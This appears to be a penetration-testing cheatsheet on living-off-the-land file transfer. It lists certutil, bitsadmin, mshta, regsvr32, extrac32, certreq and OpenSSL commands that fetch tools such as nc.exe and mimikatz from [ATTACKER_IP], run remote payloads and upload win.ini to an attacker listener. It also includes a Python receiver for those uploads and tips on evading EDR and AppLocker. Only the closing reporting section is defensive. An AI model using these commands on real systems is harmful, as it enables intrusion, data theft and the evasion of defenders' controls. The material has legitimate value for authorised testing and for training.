🗡️ Methodology Checklist
- certutil download:
  certutil -urlcache -split -f http://[LHOST]/[FILE] [FILE]
- bitsadmin download:
  bitsadmin /transfer job /download /priority high http://[LHOST]/[FILE] C:\[FILE]
- Regsvr32 scriptlet (runs a remote .sct; execution primitive, not a file download):
  regsvr32 /s /n /u /i:http://[LHOST]/file.sct scrobj.dll
- Mshta (runs a remote HTA; execution primitive, not a file download):
  mshta http://[LHOST]/payload.hta
- Check whether Windows Defender or the EDR flags LOLBAS usage on the target before relying on it
- Prefer BITS (bitsadmin or Start-BitsTransfer) over certutil in monitored environments; certutil's download syntax is heavily signatured (see the comparison table below)
🎯 Operational Context
Use when: Windows target with AppLocker or WDAC blocking unsigned binaries. Microsoft-signed LOL binaries that already live under C:\Windows perform the file transfer and sidestep the allowlist.
Think Dumber First: certutil -urlcache -split -f http://[LHOST]/file C:\Temp\file is signed by Microsoft and permitted by the default AppLocker rules (which allow everything under %WINDIR%). bitsadmin is the backup. Both ship with current Windows; bitsadmin is deprecated but still present.
Skip when: the allowlist explicitly denies certutil/bitsadmin (AppLocker deny rules or WDAC block rules) or the EDR blocks their network activity. Pivot to PowerShell Invoke-WebRequest or System.Net.WebClient if PowerShell itself is allowed.
⚡ Tactical Cheatsheet
| Command | Tactical Outcome |
|---|---|
| certutil.exe -urlcache -split -f http://[ATTACKER_IP]/nc.exe nc.exe | Download via Certutil (high detection) |
| bitsadmin /transfer wcb /priority foreground http://[ATTACKER_IP]/nc.exe C:\Windows\Temp\nc.exe | Download via BITSAdmin (CMD) |
| Import-Module BitsTransfer; Start-BitsTransfer -Source "http://[ATTACKER_IP]/nc.exe" -Destination "C:\Windows\Temp\nc.exe" | Download via BITS (PowerShell) |
| extrac32 /Y /C \\[ATTACKER_IP]\share\nc.exe C:\Windows\Temp\nc.exe | Download via Extrac32 from SMB (when HTTP is blocked) |
| certreq.exe -Post -config http://[ATTACKER_IP]:8000/ c:\windows\win.ini | Upload file via CertReq (listener on the attacker catches the POST) |
| GfxDownloadWrapper.exe "http://[ATTACKER_IP]/mimikatz.exe" "C:\Temp\mimikatz.exe" | Download via the Intel graphics driver binary (lives under C:\Windows\System32\DriverStore\FileRepository\; only present where the Intel driver is installed) |
| openssl req -newkey rsa:2048 -nodes -keyout key.pem -x509 -days 365 -out certificate.pem | Generate a self-signed cert for the OpenSSL server (Linux attacker) |
| openssl s_server -quiet -accept 80 -cert certificate.pem -key key.pem < /tmp/LinEnum.sh | Serve file over TLS with OpenSSL (Linux attacker) |
| openssl s_client -connect [ATTACKER_IP]:80 -quiet > LinEnum.sh | Receive file with the OpenSSL client (Linux victim) |
| sudo impacket-smbserver share . -smb2support -username [USER] -password [PASS] | SMB server for the Extrac32 method |
| sudo nc -lvnp 8000 | Listener to catch the CertReq POST upload (the file arrives with HTTP headers in front of it) |
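The CertReq row above catches the upload with a bare nc listener, which prints the HTTP headers and the file body as one stream, so the file has to be carved out by hand afterwards. The receiver below is an added example for this page, not part of the original cheatsheet: it accepts one connection, buffers until the request is complete (honouring Content-Length or chunked encoding), writes only the body to disk and answers 200 so certreq exits cleanly. The sample request bytes are constructed for the self-check; the exact headers certreq emits are not asserted. Port and output path are taken from the command line.

```python
"""Receive a `certreq -Post` upload and recover the file from the raw HTTP request.

Added example for this page (not part of the original cheatsheet). A bare
`nc -lvnp 8000` shows headers and body together; this strips the headers so
the uploaded bytes land on disk intact, then answers 200 so certreq exits.
The sample request at the bottom is constructed; certreq's real headers may differ.
"""
import socket
import sys


def split_request(raw: bytes):
    """Split a raw HTTP request into (request line, lower-cased header dict, body)."""
    head, sep, body = raw.partition(b"\r\n\r\n")
    if not sep:
        raise ValueError("incomplete HTTP header block")
    lines = head.split(b"\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(b":")
        headers[name.strip().lower().decode("latin-1")] = value.strip().decode("latin-1")
    return lines[0].decode("latin-1"), headers, body


def decode_chunked(body: bytes) -> bytes:
    """Decode a Transfer-Encoding: chunked body; raises ValueError if it is incomplete."""
    out, pos = bytearray(), 0
    while True:
        end = body.index(b"\r\n", pos)                 # ValueError when the size line is missing
        size = int(body[pos:end].split(b";")[0], 16)   # chunk extensions after ';' are ignored
        if size == 0:
            return bytes(out)
        out += body[end + 2:end + 2 + size]
        pos = end + 2 + size + 2                       # skip chunk data and its trailing CRLF


def extract_upload(raw: bytes) -> bytes:
    """Return the uploaded file content from a complete raw POST request."""
    request_line, headers, body = split_request(raw)
    if not request_line.upper().startswith("POST "):
        raise ValueError(f"not a POST request: {request_line!r}")
    if "chunked" in headers.get("transfer-encoding", "").lower():
        return decode_chunked(body)
    length = int(headers.get("content-length", len(body)))
    if len(body) < length:
        raise ValueError(f"short body: {len(body)} of {length} bytes")
    return body[:length]


def request_complete(buf: bytes) -> bool:
    """True once the header block and the whole body have been buffered."""
    head, sep, body = buf.partition(b"\r\n\r\n")
    if not sep:
        return False
    _, headers, _ = split_request(buf)
    if "chunked" in headers.get("transfer-encoding", "").lower():
        try:
            decode_chunked(body)
            return True
        except ValueError:
            return False
    # Without Content-Length (and not chunked) there is nothing more to wait for.
    return len(body) >= int(headers.get("content-length", 0))


def receive_once(port: int, out_path: str, timeout: float = 60.0) -> int:
    """Accept one connection, save the POST body to out_path, return bytes written.

    Loops on recv() until request_complete(): headers and file normally arrive
    in several TCP segments, so a single recv() would truncate the upload.
    """
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as srv:
        srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        srv.bind(("0.0.0.0", port))
        srv.listen(1)
        conn, peer = srv.accept()
        with conn:
            conn.settimeout(timeout)
            buf = bytearray()
            while not request_complete(bytes(buf)):
                chunk = conn.recv(65536)
                if not chunk:          # peer closed early; work with what arrived
                    break
                buf += chunk
            data = extract_upload(bytes(buf))
            conn.sendall(b"HTTP/1.1 200 OK\r\nContent-Length: 0\r\nConnection: close\r\n\r\n")
    with open(out_path, "wb") as fh:
        fh.write(data)
    print(f"[+] {len(data)} bytes from {peer[0]} -> {out_path}")
    return len(data)


# Constructed sample: the first lines of a win.ini posted with a Content-Length header.
SAMPLE_BODY = b"; for 16-bit app support\r\n[fonts]\r\n[extensions]\r\n"
SAMPLE_REQUEST = (b"POST / HTTP/1.1\r\nHost: 10.10.14.5:8000\r\n"
                  b"Content-Length: " + str(len(SAMPLE_BODY)).encode() + b"\r\n\r\n"
                  + SAMPLE_BODY)

if __name__ == "__main__":
    receive_once(int(sys.argv[1]), sys.argv[2])   # e.g. python3 receiver.py 8000 win.ini
```

Run it in place of nc (`python3 receiver.py 8000 win.ini`), then fire `certreq.exe -Post -config http://[ATTACKER_IP]:8000/ c:\windows\win.ini` on the target; compare hashes on both ends to confirm nothing was truncated.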
🔬 Deep Dive & Workflow
What is LOLBAS / GTFOBins?
Living Off The Land (LOL) uses pre-installed system binaries to perform attacker actions. This:
- Bypasses permissively configured application allowlists (AppLocker or WDAC policies that trust everything under %WINDIR% or every Microsoft-signed binary)
- Avoids dropping suspicious new binaries
- Abuses the "implicit trust" defenders place in signed OS tools
Resources:
- Windows: lolbas-project.github.io, filter by /download or /upload
- Linux: gtfobins.github.io, filter by +file download or +file upload
Windows LOLBAS Comparison
| Binary | Action | Detection | Notes |
|---|---|---|---|
| certutil | Download | Very High: Microsoft-CryptoAPI User-Agent, command line monitored by EDR | Classic; noisy |
| BITSAdmin | Download | Medium | Background transfer; mimics Windows Update |
| Extrac32 | SMB Download | Low | Useful when HTTP blocked |
| CertReq | Upload | Low-Medium | POST request to listener |
| GfxDownloadWrapper | Download | Very Low | Intel driver; rarely monitored; only present with the Intel graphics driver |
Certutil: Use Only as Last Resort
certutil.exe -urlcache -split -f http://[ATTACKER_IP]/nc.exe nc.exe
The request goes out with User-Agent: Microsoft-CryptoAPI/10.0 and the command line is a textbook EDR signature, so this is trivially detectable. Switch to BITSAdmin or Extrac32 in monitored environments.
Extrac32 Workflow (HTTP Blocked, SMB Open)
# Attacker: set up an authenticated SMB share (current Windows refuses unauthenticated guest access, hence the credentials)
sudo impacket-smbserver share . -smb2support -username user -password pass
# Victim: authenticate to the share first (extrac32 has no credential switches), then "extract" (copy) the file
net use \\[ATTACKER_IP]\share pass /user:user
extrac32 /Y /C \\[ATTACKER_IP]\share\nc.exe C:\Windows\Temp\nc.exe
OpenSSL File Transfer (Linux GTFOBins)
Creates an encrypted channel; useful when SSH is unavailable but OpenSSL is present:
# Attacker (serves file)
openssl req -newkey rsa:2048 -nodes -keyout key.pem -x509 -days 365 -out cert.pem
openssl s_server -quiet -accept 80 -cert cert.pem -key key.pem < /tmp/LinEnum.sh
# Victim (receives file)
openssl s_client -connect [ATTACKER_IP]:80 -quiet > LinEnum.sh
Notes: openssl req prompts for the certificate subject fields unless you pass -subj (for example -subj /CN=transfer), which matters in a non-interactive shell. Compare sha256sum of the file on both ends before running it; a dropped connection leaves a truncated but otherwise plausible-looking file.
Exam Mental Model
- HTTP works? → Skip LOLBAS, use standard methods
- HTTP filtered by User-Agent? → Spoof the User-Agent (see Evasion)
- AppLocker blocks PowerShell/unsigned exe? → Try LOLBAS: BITSAdmin, Extrac32, GfxDownloadWrapper
- SMB blocked too? → CertReq upload / OpenSSL tunnel
🛠️ Troubleshooting & Edge Cases
| Problem | Cause | Fix |
|---|---|---|
| certutil flagged by Defender | Defender signatures cover the certutil download syntax | Use bitsadmin: bitsadmin /transfer job /download /priority high http://[LHOST]/f C:\Temp\f |
| bitsadmin not available or denied | bitsadmin is deprecated (Microsoft no longer guarantees it ships) and hardening baselines may remove or block it | Use the BITS PowerShell module: Start-BitsTransfer -Source http://[LHOST]/f -Destination C:\Temp\f |
| msiexec /i http://[LHOST]/payload fails | msiexec only installs valid MSI packages | Package the payload as MSI: msfvenom -f msi -p ... > payload.msi, then msiexec /q /i http://[LHOST]/payload.msi |
| wmic /node: transfer rejected | Remote WMI (RPC over TCP 135) blocked between hosts | Fall back to a UNC copy with findstr: findstr /V dummystring \\[LHOST]\share\file > C:\Temp\file (reads the remote file over SMB or WebDAV and writes every line that lacks the dummy string). Note that pcalua.exe -a only launches a given path; it is not a download primitive |
| AppLocker blocks script-based transfer | Publisher or path rules deny PowerShell, cscript and wscript | In an interactive RDP session, paste the payload as base64 text through the clipboard into a file and rebuild it locally with certutil -decode in.txt out.exe (no network access involved) |
📝 Reporting Trigger
Finding Title: File Transfer via LOLBAS Bypasses Application Allowlisting
Impact: Microsoft-signed LOL binaries (certutil, bitsadmin) are permitted by the default AppLocker rules and enable file transfer without triggering application allowlisting controls, delivering attacker tools to protected endpoints.
Root Cause: Application allowlisting trusts everything under %WINDIR% (or every Microsoft-signed binary) without denying the specific binaries that provide download and upload capability.
Recommendation: Add AppLocker or WDAC deny rules for certutil.exe, bitsadmin.exe and the other transfer-capable LOL binaries on hosts that do not need them. AppLocker and WDAC govern execution, not network access, so outbound connections from these binaries must be blocked or alerted on by the EDR or host firewall instead. Alert on LOL binary process creation whose command line carries a URL or UNC path, and on their outbound connections. Where feasible, tighten WDAC to publisher rules plus explicit hash allowlisting of the binaries the business actually requires, rather than blanket trust of the Microsoft signer.